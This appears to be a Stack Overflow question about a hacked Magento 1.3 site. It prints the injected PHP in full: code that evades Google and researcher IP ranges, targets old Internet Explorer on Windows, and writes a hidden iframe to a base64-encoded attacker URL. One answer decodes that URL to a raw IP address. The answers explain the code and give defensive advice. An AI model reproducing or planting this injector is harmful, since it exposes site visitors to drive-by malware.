# PHP Web Application (Magento) hacked; What does this hacker code do?

Tags: php, security, magento, xss

I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what is the purpose of this code?

Also, how to stop this and how to spot the vulnerability?

Thank you

```
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}


$ip=$_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];


$user_agent = $_SERVER["HTTP_USER_AGENT"];

$IP = $_SERVER['REMOTE_ADDR'].".log";

@mkdir('/tmp/Location/');

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if(!file_exists("/tmp/Location/{$IP}"))
{


if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)

{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
    preg_match("/MSIE 7.0/", $user_agent) OR
    preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';

touch ("/tmp/Location/{$IP}");

}}}}
```

Comment: Where did you find this code?

Answer (score 2, accepted):

It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.

Comment: plus, it excludes some domain ranges and non-MSIE browsers because these are less likely to get the virus and more likely to get them detected...

Comment: Thanks a lot. Now is there a way to trace the problem... and to prevent it?

Comment: if I put a code on another php file that detect if this file has changed and revert the changes, will this be safe?

Comment: Detection is good however it's kind of like having a hole in your screen door. Sure, you can detect that a mosquito got in, but until you fix your hole, more mosquitos will come in.

Comment: @Rock You have to determine **how** this code get into your site. Change all the passwords, inform administator about the issue, eventually change the administrator. Also use some version-controlling system to detect _all_ the changes to the code, if you are not using one now. It seems there is something really wrong with your security.

Comment: Thank you all for your help! Very appreciated, hope this help other people as well.

Answer (score 2):

Just a friendly advice, if you are using FileZilla as FTP agent it keeps the saved passwords in an xml file, there might be a virus on your pc that can connect to FileZilla to your server and write this to your files. Also check your CPanel and look for FTP accounts that are not created by you. This might not be the case, just check in any case.

Comment: +1 for that. The first I do when checking for iFrame bugs is if the client uses FileZilla - Worst FTP Agent ever made IMO. It is terrible. Free or not free. Terrible.

Comment: Time for people to start getting a clue. Use SCP/SFTP so you're not passing login credentials as cleartext and then keep the name/password in a safe place (encrypted storage).

Answer (score 0):

```
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
```

goes to:

DO NOT CLICK THAT (this is the HACKER LINK) >>>> 129.121.38.102 / Home/ index . php

The hacker creates a log of everything that goes on your website.

Answer (score 0):

I also had similar problem with Total Commander... Virus used TC FTP account and completely changed my Website (Joomla CMS) and added similar malicious code to almost every php file.

Answer (score 0):

First upgrade your Magento it is like very old version at this point.

Your hacked code is a generic php virus code we see everytime, it is an automated virus that goes from your PC to server or from server-server

also you can use a free plugin like : magefirewall to protect your magento.

P.S Im one of the developers